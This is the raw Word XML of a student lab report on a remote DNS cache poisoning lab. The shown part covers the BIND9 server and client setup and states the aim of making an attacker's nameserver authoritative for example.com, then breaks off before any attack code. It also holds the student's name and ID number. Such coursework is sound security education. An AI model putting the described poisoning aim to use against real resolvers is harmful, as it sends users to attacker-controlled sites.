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9BA074" w14:textId="77777777" w:rsidR="00CD134A" w:rsidRPr="00CD134A" w:rsidRDefault="00CD134A" w:rsidP="00CD134A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD134A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Remote DNS Cache Poisoning Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F675828" w14:textId="77777777" w:rsidR="00CD134A" w:rsidRDefault="00CD134A" w:rsidP="00CD134A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AADE474" w14:textId="77777777" w:rsidR="00CD134A" w:rsidRDefault="00CD134A" w:rsidP="00CD134A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>NAME: JASHWANTH REDDY GANGULA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C21FB9A" w14:textId="77777777" w:rsidR="00CD134A" w:rsidRDefault="00CD134A" w:rsidP="00CD134A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>SUID: 646254141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBE0507" w14:textId="77777777" w:rsidR="00CD134A" w:rsidRDefault="00CD134A" w:rsidP="00CD134A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB0B059" w14:textId="186A3215" w:rsidR="00411C3F" w:rsidRPr="00411C3F" w:rsidRDefault="00411C3F" w:rsidP="00411C3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00411C3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00411C3F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lab Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD3E5B0" w14:textId="5CF0E95E" w:rsidR="00CD134A" w:rsidRDefault="00E42D92" w:rsidP="00CD134A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In the previous lab, we have conducted DNS attacks on the local network, i.e., attacker and DNS s</w:t>
      </w:r>
      <w:r w:rsidR="000A61F0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>erver were on the local machine, hence packet sniffing and spoofing. In this lab, we will focus on the attack assuming that attacker and server are on different networks, hence this is more difficult than previous lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED78407" w14:textId="77777777" w:rsidR="000A61F0" w:rsidRDefault="000A61F0" w:rsidP="00CD134A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C96BA2D" w14:textId="277AF01C" w:rsidR="00300527" w:rsidRDefault="0032721E" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="00300527" w:rsidRPr="00300527">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lab Environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325A1EB7" w14:textId="33335C82" w:rsidR="0032721E" w:rsidRDefault="00BC345B" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The lab environment needs three separate machines </w:t>
      </w:r>
      <w:r w:rsidR="003231AB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">including a computer for victim user, a DNS server and the attacker’s computer. </w:t>
      </w:r>
      <w:r w:rsidR="00C71B8E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC6F227" w14:textId="41449DCE" w:rsidR="00C71B8E" w:rsidRDefault="00C71B8E" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0066C74C" wp14:editId="01F871D3">
            <wp:extent cx="5880100" cy="4064000"/>
            <wp:effectExtent l="0" t="0" r="12700" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="../../../Downloads/Screenshots/Screen%20Shot%202018-03-11%20at%2011.34.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shots/Screen%20Shot%202018-03-11%20at%2011.34.17%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80100" cy="4064000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9AF96" w14:textId="77777777" w:rsidR="00D83556" w:rsidRDefault="00D83556" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5558FC3A" w14:textId="77777777" w:rsidR="00D83556" w:rsidRPr="00D83556" w:rsidRDefault="00D83556" w:rsidP="00D83556">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D83556">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.1 Configure the Local DNS server Apollo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D61EF47" w14:textId="5EB62B50" w:rsidR="00D83556" w:rsidRDefault="00D83556" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Step1: Bind9 DNS server was already installed in the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3905F0C9" w14:textId="1F929334" w:rsidR="00D37452" w:rsidRDefault="00C03275" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Step2: The DNS server needs to read a configuration file from “/etc/bind/named.conf” to start.</w:t>
      </w:r>
      <w:r w:rsidR="00E72E10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> The configuration needs to include an options file “/etc/bind/</w:t>
      </w:r>
      <w:r w:rsidR="00D37452">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>named.conf.</w:t>
      </w:r>
      <w:r w:rsidR="00CA0076">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00D37452">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ptions</w:t>
      </w:r>
      <w:r w:rsidR="00E72E10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00D37452">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">with the below content: </w:t>
      </w:r>
      <w:r w:rsidR="006D6459">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> options {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A44942B" w14:textId="7CEBABB8" w:rsidR="006D6459" w:rsidRDefault="006D6459" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="006D6459">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>dump-file "/var/cache/bind/dump.db";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C4867" w14:textId="5525E810" w:rsidR="006D6459" w:rsidRDefault="006D6459" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A381876" w14:textId="385FDBC0" w:rsidR="00DA7898" w:rsidRDefault="004D3C16" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">We will use the file “/var/cache/bind/dump.db” to dump the DNS server’s cache. </w:t>
      </w:r>
      <w:r w:rsidR="000E1312">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We use the command “sudo rndc flush” to clear the DNS cache and “sudo rndc dumpdb -cache” </w:t>
      </w:r>
      <w:r w:rsidR="00247D5A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">to dump the cache to dump.db. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7A678E" w14:textId="77777777" w:rsidR="008A2355" w:rsidRDefault="008A2355" w:rsidP="008A2355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48729993" w14:textId="77777777" w:rsidR="008A2355" w:rsidRPr="008A2355" w:rsidRDefault="008A2355" w:rsidP="008A2355">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A2355">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Step 3: Remove the example.com Zone.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5C6CFE" w14:textId="3C9B8911" w:rsidR="008A2355" w:rsidRDefault="008A2355" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">In the Local DNS attack lab, </w:t>
      </w:r>
      <w:r w:rsidR="00083501">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">we have configured the Apollo server to host the example.com domain. </w:t>
      </w:r>
      <w:r w:rsidR="000F1183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Since we are not hosting the example.com on this DNS server in this lab, we will remove the zone information from “/etc/bind/named.conf</w:t>
      </w:r>
      <w:r w:rsidR="00920B57">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.local file</w:t>
      </w:r>
      <w:r w:rsidR="000F1183">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923B735" w14:textId="77777777" w:rsidR="002E409B" w:rsidRDefault="002E409B" w:rsidP="00300527">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08568AF6" w14:textId="77777777" w:rsidR="002E409B" w:rsidRPr="002E409B" w:rsidRDefault="002E409B" w:rsidP="002E409B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E409B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Step 4: Start DNS server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1F6C6E" w14:textId="63ECF8C9" w:rsidR="00055B14" w:rsidRDefault="00E91C8C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We start the DNS server using the command “sudo /etc/init.d/bind9 restart” </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D88AF3B" w14:textId="77777777" w:rsidR="00C04AC6" w:rsidRDefault="00C04AC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55151A6F" w14:textId="6B19F2E8" w:rsidR="00C04AC6" w:rsidRDefault="00C04AC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D9E2B4D" wp14:editId="227E8751">
            <wp:extent cx="5937250" cy="1236345"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8255"/>
            <wp:docPr id="1" name="Picture 1" descr="../../../Downloads/Screenshots/Screen%20Shot%202018-03-20%20at%206.44.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s/Screen%20Shot%202018-03-20%20at%206.44.38%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250" cy="1236345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB75B80" w14:textId="77777777" w:rsidR="00C04AC6" w:rsidRDefault="00C04AC6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4340ABD6" w14:textId="77777777" w:rsidR="00BC6021" w:rsidRPr="00BC6021" w:rsidRDefault="00BC6021" w:rsidP="00BC6021">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC6021">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2.2 Configure the User Machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183E1B03" w14:textId="027AB6F6" w:rsidR="00C04AC6" w:rsidRDefault="0022168C">
      <w:r>
        <w:t xml:space="preserve">We configure the user machine with the nameserver </w:t>
      </w:r>
      <w:r w:rsidR="00AC4113">
        <w:t xml:space="preserve">as 10.0.2.7 by modifying “System Settings” -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="00295AB2">
        <w:t xml:space="preserve">“Network” </w:t>
      </w:r>
      <w:r w:rsidR="00CD70CB">
        <w:t>-&gt; “Options” -</w:t>
      </w:r>
      <w:r w:rsidR="001C6277">
        <w:t>&gt;“ IPv</w:t>
      </w:r>
      <w:r w:rsidR="00CD70CB">
        <w:t xml:space="preserve">4 Settings” -&gt; </w:t>
      </w:r>
      <w:r w:rsidR="009401C6">
        <w:t xml:space="preserve">“Method” -&gt; “Automatic(DHCP) address only” </w:t>
      </w:r>
      <w:r w:rsidR="00702734">
        <w:t xml:space="preserve">, update the “DNS Servers” entry with </w:t>
      </w:r>
      <w:r w:rsidR="001C6277">
        <w:t>10.0.2.7. Now we refresh the wired connection 1 to reflect the changes.</w:t>
      </w:r>
      <w:r w:rsidR="008570C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0936FCB5" w14:textId="77777777" w:rsidR="00C216DB" w:rsidRDefault="00C216DB"/>
    <w:p w14:paraId="778D126A" w14:textId="77777777" w:rsidR="00C216DB" w:rsidRPr="00C216DB" w:rsidRDefault="00C216DB" w:rsidP="00C216DB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C216DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3 Lab Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89563E" w14:textId="5255C125" w:rsidR="00C216DB" w:rsidRDefault="007062EC">
      <w:r>
        <w:t xml:space="preserve">In this task, we will use </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00E401D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> as our attacking target. </w:t>
      </w:r>
      <w:r w:rsidR="00C477EB">
        <w:t xml:space="preserve">It should be noted that “example.com” is reserved for </w:t>
      </w:r>
      <w:r w:rsidR="00AB367B">
        <w:t xml:space="preserve">use in documentation. </w:t>
      </w:r>
      <w:r w:rsidR="004C5656">
        <w:t xml:space="preserve">When the user issues the dig command on this name, the user machine sends the DNS query to the </w:t>
      </w:r>
      <w:r w:rsidR="00664594">
        <w:t xml:space="preserve">local DNS server, </w:t>
      </w:r>
      <w:r w:rsidR="000E0043">
        <w:t xml:space="preserve">which will eventually ask for IP address from nameserver of </w:t>
      </w:r>
      <w:r w:rsidR="00673AA0">
        <w:t>example.com.</w:t>
      </w:r>
      <w:r w:rsidR="000E0043">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59561B52" w14:textId="77777777" w:rsidR="00673AA0" w:rsidRDefault="00673AA0"/>
    <w:p w14:paraId="21883976" w14:textId="788257C6" w:rsidR="008A21E2" w:rsidRDefault="00673AA0" w:rsidP="008A21E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00673AA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The goal of the attack is to launch the DNS cache poisoning attack on the local DNS server, such that when the user runs the dig command to find out www.example.com’s IP address, the local DNS server will end up going to the attacker’s name server ns.dnslabattacker.net to get the IP address, so the</w:t>
      </w:r>
      <w:r w:rsidR="005178EE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A21E2" w:rsidRPr="008A21E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">IP address returned can be any number that is decided by the attacker. As results, the user will be led to the attacker’s web site, instead of the authentic </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="008A21E2" w:rsidRPr="00E401D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008A21E2" w:rsidRPr="008A21E2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02112C2D" w14:textId="77777777" w:rsidR="008A21E2" w:rsidRDefault="008A21E2" w:rsidP="008A21E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B6E5239" w14:textId="47D8D7AF" w:rsidR="008A21E2" w:rsidRDefault="00833B8B" w:rsidP="008A21E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In the first task, we need to poison the DNS cache of the user’s loc</w:t>
      </w:r>
      <w:r w:rsidR="008A109A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">al DNS server Apollo, such that, in the </w:t>
      </w:r>
      <w:r w:rsidR="002C521F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Apollo’s DNS cache, ns.dnslabattacker.net is set as the nameserver for the example.com domain, instead of domain’s registered authoritative name server. </w:t>
      </w:r>
      <w:r w:rsidR="006E5065">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">In the second task, we need to demonstrate the impact of the first task. More specifically, we need to run the “dig </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="006E5065" w:rsidRPr="00E401D4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          </w:rPr>
